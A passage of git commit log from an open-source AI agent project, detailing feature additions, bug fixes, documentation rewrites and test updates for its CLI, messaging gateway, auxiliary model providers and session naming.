- send_message tool support via httpx JSON-RPC (not aiohttp)
- Interactive setup wizard in 'hermes gateway setup'
- Connectivity testing during setup (pings /api/v1/check)
- signal-cli detection and install guidance

Bug fixes from PR #268:
- Timestamp reads from envelope_data (not outer wrapper)
- Uses httpx consistently (not aiohttp in send_message tool)
- SIGNAL_DEBUG scoped to signal logger (not root)
- extract_images regex NOT modified (preserves group numbering)
- pairing.py NOT modified (no cross-platform side effects)
- No dual authorization (adapter defers to run.py for user auth)
- Wildcard uses set membership ('*' in set, not list equality)
- .zip default for PK magic bytes (not .docx)

No new Python dependencies — uses httpx (already core).
External requirement: signal-cli daemon (user-installed).

Tests: 30 new tests covering config, init, helpers, session source,
phone redaction, authorization, and send_message integration.

Co-authored-by: ibhagwan <ibhagwan@users.noreply.github.com>
2026-03-08 20:20:35 -07:00
Teknium
7a8778ac73 Merge pull request #732 from NousResearch/hermes/hermes-2cb83eed
docs: comprehensive AGENTS.md audit and corrections
2026-03-08 20:10:32 -07:00
teknium1
763c6d104d fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 20:08:02 -07:00
teknium1
4d7d9d9715 fix: add diagnostic logging to browser tool for errors.log
All failure paths in _run_browser_command now log at WARNING level,
which means they automatically land in ~/.hermes/logs/errors.log
(the persistent error log captures WARNING+).

What's now logged:
- agent-browser CLI not found (warning)
- Session creation failure with task ID (warning)
- Command entry with socket_dir path and length (debug)
- Non-zero return code with stderr (warning)
- Non-JSON output from agent-browser (warning — version mismatch/crash)
- Command timeout with task ID and socket path (warning)
- Unexpected exceptions with full traceback (warning + exc_info)
- browser_vision: which model is used and screenshot size (debug)
- browser_vision: LLM analysis failure with full traceback (warning)

Also fixed: _get_vision_model() was called twice in browser_vision —
now called once and reused.
2026-03-08 19:54:41 -07:00
teknium1
a9c35f9175 docs: comprehensive rewrite of all messaging platform setup guides
All four platform guides rewritten from thin ~60-line summaries to
comprehensive step-by-step setup guides with current (2025-2026) info:

telegram.md (74 → 196 lines):
- Full BotFather walkthrough with customization commands
- Privacy mode section with critical group chat gotcha
- Multiple user ID discovery methods
- Voice message setup (Whisper STT + TTS bubbles + ffmpeg)
- Group chat usage patterns and admin mode
- Recent Bot API features (privacy policy requirement, streaming)
- Troubleshooting table (6 issues)

discord.md (57 → 260 lines):
- Complete Developer Portal walkthrough (application, bot, intents)
- Detailed Privileged Gateway Intents section with warning about
  Message Content Intent being #1 failure cause
- Invite URL generation via Installation tab (new 2024) and manual
- Permission integer calculation (274878286912 recommended)
- Developer Mode user ID discovery
- Bot behavior documentation (DMs, channels, no-prefix)
- Troubleshooting table (6 issues)

slack.md (57 → 214 lines):
- Warning about classic Slack apps deprecated since March 2025
- Full scope tables (required + optional) with purposes
- Socket Mode setup with App-Level Token (xapp-)
- Event Subscriptions configuration
- User ID discovery via profile
- Two-token architecture explained (xoxb- + xapp-)
- Troubleshooting table

whatsapp.md (77 → 193 lines):
- Clarified whatsapp-web.js (not Business API) with ban risk warnings
- Linux Chromium dependencies (Debian + Fedora)
- Setup wizard QR code scanning workflow
- Session persistence with LocalAuth
- Second phone number options with cost table
- WhatsApp Web protocol update warnings
- Troubleshooting table (7 issues)

Docusaurus build verified clean.
2026-03-08 19:51:42 -07:00
teknium1
37752ff1ac feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 19:41:17 -07:00
teknium1
31b84213e4 docs: add Guides & Tutorials section, restructure sidebar
New documentation pages (1,823 lines):
- getting-started/learning-path.md: 3-tier learning path table
  (beginner/intermediate/advanced) + use-case-based navigation
- guides/tips.md: Tips & Best Practices quick-wins collection
  covering prompting, CLI power user tips, context files, memory,
  performance/cost, messaging, and security
- guides/daily-briefing-bot.md: End-to-end tutorial building an
  automated daily news briefing with cron + web search + messaging
- guides/team-telegram-assistant.md: Full walkthrough setting up
  a team Telegram bot with BotFather, gateway, DM pairing, and
  production deployment
- guides/python-library.md: Guide to using AIAgent as a Python
  library — basic usage, multi-turn conversations, toolset config,
  trajectories, custom prompts, and integration examples (FastAPI,
  Discord bot, CI/CD)
- reference/faq.md: Centralized FAQ (8 questions) + troubleshooting
  guide (6 categories, 18 specific issues) with problem/cause/solution
  format

Sidebar restructure:
- Added 'Guides & Tutorials' as new top-level section
- Reorganized flat Features list (17 items) into 5 subcategories:
  Core Features, Automation, Web & Media, Integrations, Advanced
- Added FAQ to Reference section
- Updated index.md quick links table

Docusaurus build verified clean.
2026-03-08 19:37:34 -07:00
teknium1
2036c22f88 fix: macOS browser/code-exec socket path exceeds Unix limit (#374)
macOS sets TMPDIR to /var/folders/xx/.../T/ (~51 chars). Combined with
agent-browser session names, socket paths reach 121 chars — exceeding
the 104-byte macOS AF_UNIX limit. This causes 'Screenshot file was not
created' errors and silent browser_vision failures on macOS.

Fix: use /tmp/ on macOS (symlink to /private/tmp, sticky-bit protected).
On Linux, tempfile.gettempdir() already returns /tmp — no behavior change.

Changes in browser_tool.py:
- Add _socket_safe_tmpdir() helper — returns /tmp on macOS, gettempdir()
  elsewhere
- Replace all 3 tempfile.gettempdir() calls for socket dirs
- Set mode=0o700 on socket dirs for privacy (was using default umask)
- Guard vision/text client init with try/except — a broken auxiliary
  config no longer prevents the entire browser_tool module from importing
  (which would disable all 10 browser tools, not just vision)
- Improve screenshot error messages with mode info and diagnostic hints
- Don't delete screenshots when LLM analysis fails — the capture was
  valid, only the vision API call failed. Screenshots are still cleaned
  up by the existing 24-hour _cleanup_old_screenshots mechanism.

Changes in code_execution_tool.py:
- Same /tmp fix for RPC socket path (was 103 chars on macOS — one char
  from the 104-byte limit)
2026-03-08 19:31:23 -07:00
teknium1
7185a66b96 feat: enhance Solana skill with USD pricing, token names, smart wallet output
Enhancements to the Solana blockchain skill (PR #212 by gizdusum):

- CoinGecko price integration (free, no API key)
  - Wallet shows tokens with USD values, sorted by value
  - Token info includes price and market cap
  - Transaction details show USD amounts for balance changes
  - Whale detector shows USD alongside SOL amounts
  - Stats includes SOL price and market cap
  - New `price` command for quick lookups by symbol or mint

- Smart wallet output
  - Tokens sorted by USD value (highest first)
  - Default limit of 20 tokens (--limit N to adjust)
  - Dust filtering (< $0.01 tokens hidden, count shown)
  - --all flag to see everything
  - --no-prices flag for fast RPC-only mode
  - NFT summary (count + first 10)
  - Portfolio total in USD

- Token name resolution
  - 25+ well-known tokens mapped (SOL, USDC, BONK, JUP, etc.)
  - CoinGecko fallback for unknown tokens
  - Abbreviated mint addresses for unlabeled tokens

- Reliability
  - Retry with exponential backoff on 429 rate-limit (RPC + CoinGecko)
  - Graceful degradation when price data unavailable
  - Capped API calls to respect CoinGecko free-tier limits

- Updated SKILL.md with all new capabilities and flags
2026-03-08 19:15:11 -07:00
teknium1
2394e18729 fix: add context to interruption messages for model awareness
When the agent is interrupted, the model now receives descriptive
context instead of a generic 'Operation interrupted.' string:

- Tool skip messages include the tool name:
  '[Tool execution cancelled — terminal was skipped due to user interrupt]'
  '[Tool execution skipped — web_search was not started. User sent a new message]'

- API call interrupts include timing:
  'Operation interrupted: waiting for model response (4.2s elapsed).'

- Retry/error interrupts include retry context:
  'Operation interrupted: retrying API call after rate limit (retry 2/5).'
  'Operation interrupted: handling API error (Timeout: connection timed out).'

This helps the model understand what was happening when it was
interrupted, reducing wasted iterations spent re-discovering state.
2026-03-08 18:58:23 -07:00
teknium1
99f7582175 chore: move Solana skill to optional-skills/
Solana blockchain queries are a niche use case — not needed by every user.
Moved from skills/ (bundled) to optional-skills/ (installable via Skills Hub).
2026-03-08 18:52:02 -07:00
teknium1
93c5997290 Merge PR #212: feat(skills): add Solana blockchain skill
Authored by Deniz Alagoz (gizdusum). Closes #164.
Will be moved to optional-skills/ and enhanced post-merge.
2026-03-08 18:51:33 -07:00
teknium1
2d1a1c1c47 refactor: remove redundant 'openai' auxiliary provider, clean up docs
The 'openai' provider was redundant — using OPENAI_BASE_URL +
OPENAI_API_KEY with provider: 'main' already covers direct OpenAI API.

Provider options are now: auto, openrouter, nous, codex, main.

- Removed _try_openai(), _OPENAI_AUX_MODEL, _OPENAI_BASE_URL
- Replaced openai tests with codex provider tests
- Updated all docs to remove 'openai' option and clarify 'main'
- 'main' description now explicitly mentions it works with OpenAI API,
  local models, and any OpenAI-compatible endpoint

Tests: 2467 passed.
2026-03-08 18:50:26 -07:00
teknium1
71e81728ac feat: Codex OAuth vision support + multimodal content adapter
The Codex Responses API (chatgpt.com/backend-api/codex) supports
vision via gpt-5.3-codex. This was verified with real API calls
using image analysis.

Changes to _CodexCompletionsAdapter:
- Added _convert_content_for_responses() to translate chat.completions
  multimodal format to Responses API format:
  - {type: 'text'} → {type: 'input_text'}
  - {type: 'image_url', image_url: {url: '...'}} → {type: 'input_image', image_url: '...'}
- Fixed: removed 'stream' from resp_kwargs (responses.stream() handles it)
- Fixed: removed max_output_tokens and temperature (Codex endpoint rejects them)

Provider changes:
- Added 'codex' as explicit auxiliary provider option
- Vision auto-fallback now includes Codex (OpenRouter → Nous → Codex)
  since gpt-5.3-codex supports multimodal input
- Updated docs with Codex OAuth examples

Tested with real Codex OAuth token + ~/.hermes/image2.png — confirmed
working end-to-end through the full adapter pipeline.

Tests: 2459 passed.
2026-03-08 18:44:33 -07:00
Teknium
ebe60646db Merge pull request #735 from NousResearch/hermes/hermes-f8d56335
fix: allow non-codex-suffixed models (e.g. gpt-5.4) with OpenAI Codex provider
2026-03-08 18:30:27 -07:00
teknium1
f996d7950b fix: trust user-selected models with OpenAI Codex provider
The Codex model normalization was rejecting any model without 'codex'
in its name, forcing a fallback to gpt-5.3-codex. This blocked models
like gpt-5.4 that the Codex API actually supports.

The fix simplifies _normalize_model_for_provider() to two operations:
1. Strip provider prefixes (API needs bare slugs)
2. Replace the *untouched default* model with a Codex-compatible one

If the user explicitly chose a model — any model — we trust them and
let the API be the judge. No allowlists, no slug checks.

Also removes the 'codex not in slug' filter from _read_cache_models()
so the local cache preserves all API-available models.

Inspired by OpenClaw's approach which explicitly lists non-codex models
(gpt-5.4, gpt-5.2) as valid Codex models.
2026-03-08 18:29:09 -07:00
teknium1
ae4a674c84 feat: add 'openai' as auxiliary provider option
Users can now set provider: "openai" for auxiliary tasks (vision, web
extract, compression) to use OpenAI's API directly with their
OPENAI_API_KEY. This hits api.openai.com/v1 with gpt-4o-mini as the
default model — supports vision since GPT-4o handles image input.

Provider options are now: auto, openrouter, nous, openai, main.

Changes:
- agent/auxiliary_client.py: added _try_openai(), "openai" case in
  _resolve_forced_provider(), updated auxiliary_max_tokens_param()
  to use max_completion_tokens for OpenAI
- Updated docs: cli-config.yaml.example, AGENTS.md, and user-facing
  configuration.md with Common Setups section showing OpenAI,
  OpenRouter, and local model examples
- 3 new tests for OpenAI provider resolution

Tests: 2459 passed (was 2429).
2026-03-08 18:25:30 -07:00
teknium1
169615abc8 docs: add Auxiliary Models section to user-facing configuration docs
Adds clear how-to documentation for changing the vision model, web
extraction model, and compression model to the user-facing docs site
(website/docs/user-guide/configuration.md).

Includes:
- Full auxiliary config.yaml example
- 'Changing the Vision Model' walkthrough with config + env var options
- Provider options table (auto/openrouter/nous/main)
- Multimodal safety warning for vision
- Environment variable reference table
- Updated the warning about OpenRouter-dependent tools to mention
  auxiliary model configuration
2026-03-08 18:10:55 -07:00
teknium1
7c30ac2141 fix: overhaul ascii-art skill with working sources (#662)
Major issues fixed:
- Removed dead APIs: artii.herokuapp.com (404 since Heroku free tier
  ended 2022), patorjk.com TAAG AJAX endpoint (404)
- Removed unusable sources: emojicombos.com (3.3MB JS blob, not
  curl-accessible), asciiart.eu (art loads via JavaScript only)

New working sources added:
- asciified API (asciified.thelicato.io): free text-to-ASCII REST API,
  250+ FIGlet fonts, returns plain text, no auth — perfect remote
  alternative when pyfiglet isn't installed
- ascii.co.uk: classic ASCII art archive, art in <pre> tags,
  extractable with simple curl + Python parsing
- qrenco.de: QR codes as ASCII art via curl
- wttr.in: weather and moon phase as ASCII art via curl

Also fixed: Tool 6 no longer relies on web_extract inside
execute_code (which was the original #662 bug). All web lookups
now use terminal curl which is universally available.
2026-03-08 18:09:44 -07:00
teknium1
192501528f docs: add Auxiliary Model Configuration section to AGENTS.md
Clear how-to documentation for changing the vision model, web extraction
model, and compression model. Includes config.yaml examples, env var
alternatives, provider options table, and multimodal safety notes.
2026-03-08 18:09:18 -07:00
teknium1
5ae0b731d0 fix: harden auxiliary model config — gateway bridge, vision safety, tests
Improvements on top of PR #606 (auxiliary model configuration):

1. Gateway bridge: Added auxiliary.* and compression.summary_provider
   config bridging to gateway/run.py so config.yaml settings work from
   messaging platforms (not just CLI). Matches the pattern in cli.py.

2. Vision auto-fallback safety: In auto mode, vision now only tries
   OpenRouter + Nous Portal (known multimodal-capable providers).
   Custom endpoints, Codex, and API-key providers are skipped to avoid
   confusing errors from providers that don't support vision input.
   Explicit provider override (AUXILIARY_VISION_PROVIDER=main) still
   allows using any provider.

3. Comprehensive tests (46 new):
   - _get_auxiliary_provider env var resolution (8 tests)
   - _resolve_forced_provider with all provider types (8 tests)
   - Per-task provider routing integration (4 tests)
   - Vision auto-fallback safety (7 tests)
   - Config bridging logic (11 tests)
   - Gateway/CLI bridge parity (2 tests)
   - Vision model override via env var (2 tests)
   - DEFAULT_CONFIG shape validation (4 tests)

4. Docs: Added auxiliary_client.py to AGENTS.md project structure.
   Updated module docstring with separate text/vision resolution chains.

Tests: 2429 passed (was 2383).
2026-03-08 18:06:47 -07:00
teknium1
d9f373654b feat: enhance auxiliary model configuration and environment variable handling
- Added support for auxiliary model overrides in the configuration, allowing users to specify providers and models for vision and web extraction tasks.
- Updated the CLI configuration example to include new auxiliary model settings.
- Enhanced the environment variable mapping in the CLI to accommodate auxiliary model configurations.
- Improved the resolution logic for auxiliary clients to support task-specific provider overrides.
- Updated relevant documentation and comments for clarity on the new features and their usage.
2026-03-08 18:06:47 -07:00
Teknium
0efbb137e8 Merge pull request #734 from NousResearch/hermes/hermes-f8d56335
feat: display previous messages when resuming a session in CLI
2026-03-08 18:06:00 -07:00
teknium1
cf63b2471f docs: add resume history display to sessions, CLI, config, and AGENTS docs
- sessions.md: New 'Conversation Recap on Resume' subsection with visual
  example, feature bullet points, and config snippet
- cli.md: New 'Session Resume Display' subsection with cross-reference
- configuration.md: Add resume_display to display settings YAML block
- AGENTS.md: Add _preload_resumed_session() and _display_resumed_history()
  to key components, add UX note about resume panel
2026-03-08 17:55:14 -07:00
teknium1
f88343a6da Merge PR #733: feat: interactive session browser with search filtering (#718) 2026-03-08 17:47:42 -07:00
teknium1
491605cfea feat: add high-value tool result hints for patch and search_files (#722)
Add contextual [Hint: ...] suffixes to tool results where they save
real iterations:

- patch (no match): suggests read_file/search_files to verify content
  before retrying — addresses the common pattern where the agent retries
  with stale old_string instead of re-reading the file.
- search_files (truncated): provides explicit next offset and suggests
  narrowing the search — clearer than relying on total_count inference.

Other hints proposed in #722 (terminal, web_search, web_extract,
browser_snapshot, search zero-results, search content-matches) were
evaluated and found to be low-value: either already covered by existing
mechanisms (read_file pagination, similar-files, schema descriptions)
or guidance the agent already follows from its own reasoning.

5 new tests covering hint presence/absence for both tools.
2026-03-08 17:46:28 -07:00
teknium1
3aded1d4e5 feat: display previous messages when resuming a session in CLI
When resuming a session via --continue or --resume, show a compact recap
of the previous conversation inside a Rich panel before the input prompt.
This gives users immediate visual context about what was discussed.

Changes:
- Add _preload_resumed_session() to load session history early (in run(),
  before banner) so _init_agent() doesn't need a separate DB round-trip
- Add _display_resumed_history() that renders a formatted recap panel:
  * User messages shown with gold bullet (truncated at 300 chars)
  * Assistant responses shown with green diamond (truncated at 200 chars / 3 lines)
  * Tool calls collapsed to count + tool names
  * System messages and tool results hidden
  * <REASONING_SCRATCHPAD> blocks stripped from display
  * Pure-reasoning messages (no visible output) skipped entirely
  * Capped at last 10 exchanges with 'N earlier messages' indicator
  * Dim/muted styling distinguishes recap from active conversation
- Add display.resume_display config option: 'full' (default) or 'minimal'
- Store resume_display as instance variable (like compact) for testability
- 27 new tests covering all display scenarios, config, and edge cases

Closes #719
2026-03-08 17:45:45 -07:00
teknium1
4f0402ed3a chore: remove all NOUS_API_KEY references
NOUS_API_KEY is unused — vision tools use OPENROUTER_API_KEY or Nous
Portal OAuth (auth.json), and MoA tools use OPENROUTER_API_KEY.

Removed from:
- hermes_cli/config.py: api_keys allowlist for config set routing
- .env.example: example env file entry and comment
- tests/hermes_cli/test_set_config_value.py: parametrize test data
- tests/integration/test_web_tools.py: updated comments and log
  messages to reference 'auxiliary LLM provider' instead of NOUS_API_KEY

No HECATE references found in codebase (already cleaned up).
2026-03-08 17:45:38 -07:00
teknium1
ecac6321c4 feat: interactive session browser with search filtering (#718)
Add `hermes sessions browse` — a curses-based interactive session picker
with live type-to-search filtering, arrow key navigation, and seamless
session resume via Enter.

Features:
- Arrow keys to navigate, Enter to select and resume, Esc/q to quit
- Type characters to live-filter sessions by title, preview, source, or ID
- Backspace to edit filter, first Esc clears filter, second Esc exits
- Adaptive column layout (title/preview, last active, source, ID)
- Scrolling support for long session lists
- --source flag to filter by platform (cli, telegram, discord, etc.)
- --limit flag to control how many sessions to load (default: 50)
- Windows fallback: numbered list with input prompt
- After selection, seamlessly execs into `hermes --resume <id>`

Design decisions:
- Separate subcommand (not a flag on -c) — preserves `hermes -c` as-is
  for instant most-recent-session resume
- Uses curses (not simple_term_menu) per Known Pitfalls to avoid the
  arrow-key ghost-duplication rendering bug in tmux/iTerm
- Follows existing curses pattern from hermes_cli/tools_config.py

Also fixes: removed redundant `import os` inside cmd_sessions stats
block that shadowed the module-level import (would cause UnboundLocalError
if browse action was taken in the same function).

Tests: 33 new tests covering curses picker, fallback mode, filtering,
navigation, edge cases, and argument parser registration.
2026-03-08 17:42:50 -07:00
teknium1
20c6573e0a docs: comprehensive AGENTS.md audit and corrections
Major fixes:
- Default model: claude-sonnet-4.6 → claude-opus-4.6
- max_iterations default: 60 → 90 (also fixed in config.py OPTIONAL_ENV_VARS description)
- chat() signature: chat(user_message, task_id) → chat(message)
- Agent loop: _run_agent_loop() doesn't exist, loop is in run_conversation()
- Removed async/await references (agent is entirely synchronous)
- KawaiiSpinner location: run_agent.py → agent/display.py
- NOUS_API_KEY removed (not used by any tool), replaced with VOICE_TOOLS_OPENAI_KEY
- OPENAI_API_KEY for Whisper → VOICE_TOOLS_OPENAI_KEY
- check_for_missing_config() → check_config_version() + get_missing_env_vars()
- Adding tools: '2 files' → '3 files' (tool + model_tools.py + toolsets.py)
- Venv path: venv/ → .venv/
- Trajectory output path: trajectories/*.jsonl → trajectory_samples.jsonl
- process_command() location clarified (HermesCLI in cli.py, not commands.py)
- REQUIRED_ENV_VARS noted as intentionally empty
- _config_version noted as currently at version 5

New content:
- Project structure: added 40+ missing files across agent/, hermes_cli/, tools/, gateway/
- Full gateway/ directory listing with all modules and platforms/
- Added honcho_integration/, scripts/, tests/ directories
- Added hermes_constants.py, hermes_time.py, trajectory_compressor.py, utils.py
- CLI commands table: added 25+ missing commands (model, login, logout, whatsapp,
  skills subsystem, tools, insights, gateway start/stop/restart/status/uninstall,
  sessions export/delete/prune/stats, config path/env-path/show)
- Gateway slash commands section with all 20+ commands
- Platform toolsets: added hermes-cli, hermes-slack, hermes-homeassistant, hermes-gateway
- Gateway: added Home Assistant as supported platform
2026-03-08 17:38:05 -07:00
teknium1
97b1c76b14 test: add regression test for #712 (setup wizard codex import)
Verifies that setup.py imports the correct function name
(get_codex_model_ids) from codex_models.py. This would have caught
the ImportError bug before it reached users.
2026-03-08 17:32:52 -07:00
teknium1
24a37032fa Merge PR #711: fix(setup): correct import of get_codex_model_ids in setup wizard
Authored by dragonkhoi. Fixes #712.
2026-03-08 17:29:38 -07:00
teknium1
c0520223fd fix: clipboard BMP conversion file loss and broken test
Source code (hermes_cli/clipboard.py):
- _convert_to_png() lost the file when both Pillow and ImageMagick were
  unavailable: path.rename(tmp) moved the file to .bmp, then subprocess.run
  raised FileNotFoundError, but the file was never renamed back. The final
  fallback 'return path.exists()' returned False.
- Fix: restore the original file in both except handlers by renaming tmp
  back to path when the original is missing.

Test (tests/tools/test_clipboard.py):
- test_file_still_usable_when_no_converter expected 'from PIL import Image'
  to raise an Exception, but Pillow is installed so pytest.raises fired
  'DID NOT RAISE'. The test also never called _convert_to_png().
- Fix: properly mock PIL unavailability via patch.dict(sys.modules),
  actually call _convert_to_png(), and assert the correct result.
2026-03-08 17:22:27 -07:00
teknium1
1f1caa836a fix: error out when hermes -w is used outside a git repo
Previously, --worktree printed a yellow warning and continued without
isolation, silently defeating the purpose of the flag. Now it prints
a clear error message and exits immediately.
2026-03-08 17:22:24 -07:00
teknium1
b3ea7714f5 docs: add dedicated /compress command documentation
Add a detailed section for /compress in the CLI Commands Reference,
explaining what it does, when to use it, requirements, and output format.
Previously only had a one-line table entry.
2026-03-08 17:21:15 -07:00
teknium1
a7f9721785 feat: register remaining commands with platform menus
Telegram: add /insights, /update, /reload_mcp (underscore variant since
Telegram BotCommand names don't allow hyphens).

Discord: add /insights (with days parameter), /reload-mcp.

Also add reload_mcp as an alias for reload-mcp in the gateway command
dispatcher so Telegram's underscore form works, and add resume/provider
to the _known_commands set for hook emission.
2026-03-08 17:13:45 -07:00
teknium1
a5461e07bf feat: register title, resume, and other missing commands with platform menus
Add /title, /resume, /compress, /provider, /usage to Telegram's
set_my_commands so they appear in the / autocomplete menu.

Add /title, /resume, /compress, /provider, /usage, /help as Discord
slash commands so they appear in Discord's native command picker.

These commands were functional via text but not registered with the
platform-native command menus, so users couldn't discover them.
2026-03-08 17:11:49 -07:00
teknium1
2e73a9e893 Merge PR #704: fix: initialize Skills Hub before listing skills
Authored by PeterFile. Fixes #703.
2026-03-08 17:10:54 -07:00
teknium1
26bb56b775 feat: add /resume command to gateway for switching to named sessions
Messaging users can now switch back to previously-named sessions:
- /resume My Project  — resolves the title (with auto-lineage) and
  restores that session's conversation history
- /resume (no args)   — lists recent titled sessions to choose from

Adds SessionStore.switch_session() which ends the current session and
points the session entry at the target session ID so the old transcript
is loaded on the next message. Running agents are cleared on switch.

Completes the session naming feature from PR #720 for gateway users.

8 new tests covering: name resolution, lineage auto-latest, already-on-
session check, nonexistent names, agent cleanup, no-DB fallback, and
listing titled sessions.
2026-03-08 17:09:00 -07:00
teknium1
95b1130485 fix: normalize incompatible models when provider resolves to Codex
When _ensure_runtime_credentials() resolves the provider to openai-codex,
check if the active model is Codex-compatible.  If not (e.g. the default
anthropic/claude-opus-4.6), swap it for the best available Codex model.
Also strips provider prefixes the Codex API rejects (openai/gpt-5.3-codex
→ gpt-5.3-codex).

Adds _model_is_default flag so warnings are only shown when the user
explicitly chose an incompatible model (not when it's the config default).

Fixes #651.

Co-inspired-by: stablegenius49 (PR #661)
Co-inspired-by: teyrebaz33 (PR #696)
2026-03-08 16:48:56 -07:00
teknium1
3fb8938cd3 fix: search_files now reports error for non-existent paths instead of silent empty results
Previously, search_files would silently return 0 results when the
search path didn't exist (e.g., /root/.hermes/... when HOME is
/home/user). The path was passed to rg/grep/find which would fail
silently, and the empty stdout was parsed as 'no matches found'.

Changes:
- Add path existence check at the top of search() using test -e.
  Returns SearchResult with a clear error message when path doesn't exist.
- Add exit code 2 checks in _search_with_rg() and _search_with_grep()
  as secondary safety net for other error types (bad regex, permissions).
- Add 4 new tests covering: nonexistent path (content mode), nonexistent
  path (files mode), existing path proceeds normally, rg error exit code.

Tests: 37 → 41 in test_file_operations.py, full suite 2330 passed.
2026-03-08 16:47:20 -07:00
Teknium
c5e8166c8b Merge pull request #720 from NousResearch/feat/session-naming
feat: Session naming with unique titles, auto-lineage & rich listing
2026-03-08 16:32:13 -07:00
teknium1
2b88568653 docs: add session naming documentation across all doc files
- website/docs/user-guide/sessions.md: New 'Session Naming' section
  with /title usage, title rules, auto-lineage, gateway support.
  Updated 'Resume by Name' section, 'Rename a Session' subsection,
  updated sessions list output format, updated DB schema description.
- website/docs/reference/cli-commands.md: Added -c "name" and
  --resume by title to Core Commands, sessions rename to Sessions
  table, /title to slash commands.
- website/docs/user-guide/cli.md: Added -c "name" and --resume by
  title to resume options.
- AGENTS.md: Added -c, --resume, sessions list/rename to CLI commands
  table. Added hermes_state.py to project structure.
- CONTRIBUTING.md: Updated hermes_state.py and session persistence
  descriptions to mention titles.
- hermes_cli/main.py: Fixed sessions help string to include 'rename'.
2026-03-08 16:09:31 -07:00
teknium1
34b4fe495e fix: add title validation — sanitize, length limit, control char stripping
- Add SessionDB.sanitize_title() static method:
  - Strips ASCII control chars (null, bell, ESC, etc.) except whitespace
  - Strips problematic Unicode controls (zero-width, RTL override, BOM)
  - Collapses whitespace runs, strips edges
  - Normalizes empty/whitespace-only to None
  - Enforces 100 char max length (raises ValueError)
- set_session_title() now calls sanitize_title() internally,
  so all call sites (CLI, gateway, auto-lineage) are protected
- CLI /title handler sanitizes early to show correct feedback
- Gateway /title handler sanitizes early to show correct feedback
- 24 new tests: sanitize_title (17 cases covering control chars,
  zero-width, RTL, BOM, emoji, CJK, length, integration),
  gateway validation (too long, control chars, only-control-chars)
2026-03-08 15:54:51 -07:00
teknium1
4fdd6c0dac fix: harden session title system + add /title to gateway
- Empty string titles normalized to None (prevents uncaught IntegrityError
  when two sessions both get empty-string titles via the unique index)
- Escape SQL LIKE wildcards (%, _) in resolve_session_by_title and
  get_next_title_in_lineage to prevent false matches on titles like
  'test_project' matching 'testXproject #2'
- Optimize list_sessions_rich from N+2 queries to a single query with
  correlated subqueries (preview + last_active computed in SQL)
- Add /title slash command to gateway (Telegram, Discord, Slack, WhatsApp)
  with set and show modes, uniqueness conflict handling
- Add /title to gateway /help text and _known_commands
- 12 new tests: empty string normalization, multi-empty-title safety,
  SQL wildcard edge cases, gateway /title set/show/conflict/cross-platform
2026-03-08 15:48:09 -07:00
teknium1
60b6abefd9 feat: session naming with unique titles, auto-lineage, rich listing, resume by name
- Schema v4: unique title index, migration from v2/v3
- set/get/resolve session titles with uniqueness enforcement
- Auto-lineage: context compression auto-numbers titles (Task -> Task #2 -> Task #3)
- resolve_session_by_title: auto-latest finds most recent continuation
- list_sessions_rich: preview (first 60 chars) + last_active timestamp
- CLI: -c accepts optional name arg (hermes -c 'my project')
- CLI: /title command with deferred mode (set before session exists)
- CLI: sessions list shows Title, Preview, Last Active, ID
- 27 new tests (1844 total passing)
2026-03-08 15:20:29 -07:00
teknium1
4d53b7ccaa Add OpenRouter app attribution headers to skills_guard and trajectory_compressor
These two files were creating bare OpenAI clients pointing at OpenRouter
without the HTTP-Referer / X-OpenRouter-Title / X-OpenRouter-Categories
headers that the rest of the codebase sends for app attribution.

- skills_guard.py: LLM audit client (always OpenRouter)
- trajectory_compressor.py: sync + async summarization clients
  (guarded with 'openrouter' in base_url check since the endpoint
  is user-configurable)
2026-03-08 14:23:18 -07:00
Khoi Le
081079da62 fix(setup): correct import of get_codex_model_ids in setup wizard
The setup wizard imported `get_codex_models` which does not exist;
the actual function is `get_codex_model_ids`. This caused a runtime
ImportError when selecting the openai-codex provider during setup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-08 13:07:19 -07:00
Verne
333e4abe30 fix: Initialize Skills Hub on list
Call ensure_hub_dirs() at the start of hermes skills list so the\nSkills Hub directory structure is created before reading hub\nmetadata.\n\nAdd a regression test covering the empty-home path where\ndoctor recommends running the list command.\n\nRefs: #703
2026-03-09 01:43:59 +08:00
teknium1
cd77c7100c Merge PR #648: test: add regression coverage for compressor tool-call boundaries
Authored by intertwine. Related to #647.
2026-03-08 06:46:50 -07:00
teknium1
cf810c2950 fix: pre-process CLI clipboard images through vision tool instead of raw embedding
Images pasted in the CLI were embedded as raw base64 image_url content
parts in the conversation history, which only works with vision-capable
models. If the main model (e.g. Nous API) doesn't support vision, this
breaks the request and poisons all subsequent messages.

Now the CLI uses the same approach as the messaging gateway: images are
pre-processed through the auxiliary vision model (Gemini Flash via
OpenRouter or Nous Portal) and converted to text descriptions. The
local file path is included so the agent can re-examine via
vision_analyze if needed. Works with any model.

Fixes #638.
2026-03-08 06:22:00 -07:00
teknium1
a23bcb81ce fix: improve /model user feedback + update docs
User messaging improvements:
- Rejection: '(>_<) Error: not a valid model' instead of '(^_^) Warning: Error:'
- Rejection: shows 'Model unchanged' + tip about /model and /provider
- Session-only: explains 'this session only' with reason and 'will revert on restart'
- Saved: clear '(saved to config)' confirmation

Docs updated:
- cli-commands.md, cli.md, messaging/index.md: /model now shows
  provider:model syntax, /provider command added to tables

Test fixes: deduplicated test names, assertions match new messages.
